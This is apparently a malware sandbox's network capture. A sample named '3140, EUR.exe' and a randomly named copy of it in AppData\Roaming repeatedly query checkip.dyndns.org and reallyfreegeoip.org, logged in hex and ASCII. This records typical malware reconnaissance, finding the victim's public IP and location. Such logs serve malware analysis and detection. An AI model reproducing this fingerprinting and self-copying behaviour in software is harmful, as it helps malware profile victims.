Sep 30, 2024 15:03:06.649216890 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:07.936012030 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:08.586637020 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:10.431041956 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:11.062177896 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:12.264158010 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:11.064553976 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:12.001118898 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 30, 2024 15:03:12.005088091 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:13.303366899 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 30, 2024 15:03:14.494669914 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:16.208565950 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:12.931226969 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:13.845216990 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:14.497517109 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:16.800672054 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49755	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:17.160518885 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:20.142450094 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:17.418443918 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:20.679902077 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49759	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:20.778690100 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 30, 2024 15:03:24.221577883 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49760	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:21.278218031 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:25.340111017 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49762	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:24.864725113 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:27.489059925 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49764	132.226.8.169	80	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:26.003593922 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:28.207456112 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49767	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:28.252671957 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:33.059257984 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49770	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:33.723587036 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:35.715447903 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49773	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:36.346575022 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:38.217669964 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49775	132.226.8.169	80	7552	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:03:38.824012995 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 30, 2024 15:03:39.961122990 CEST	272	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:06 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-30 13:03:06 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17417 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGgNz388eZ3clN7VH1iqYY9uMHiIvh0SFjIKHziwKuJmG2pRExVhplURlwox4mVkT9p%2F%2FXGzeR2ZUOlbkA78jjitNPgJikH6W08bcrfBQY8PSJWutBEQWY4h9WwiJOKMGN00wjAu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb469422dbf427c-EWR
2024-09-30 13:03:06 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:08 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:08 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17419 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RaZW3pA1EvEcaISl1GyVnZLp%2FHlirLa8di5iY6jnGZFRAkL40i8FADi6iAVJxGHhWS9D2PVaVn9BmDnd%2FRPjPfHlgmWRveDXuysgBJ%2BlWXl9IAvmwR9pWC5JZhcmKrOd5SyKvLH0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb4694e28790f5f-EWR
2024-09-30 13:03:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 13:03:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.97.3	443	7180	C:\Users\user\Desktop\3140, EUR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:03:10 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-30 13:03:11 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:03:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17422 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trw8mck2yj1O9lvcf57FPINePVPi7QgoYudagzIWeEcwZXmMEFZG0fmr85s3IDpCQ8fGB3NnbYDVhJYhbNGWJy5qwpOv5Zi2lJITlzr%2BmteYHk5xmnm7bCWvYKw2r6cECizzzjvr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb4695db83642a5-EWR
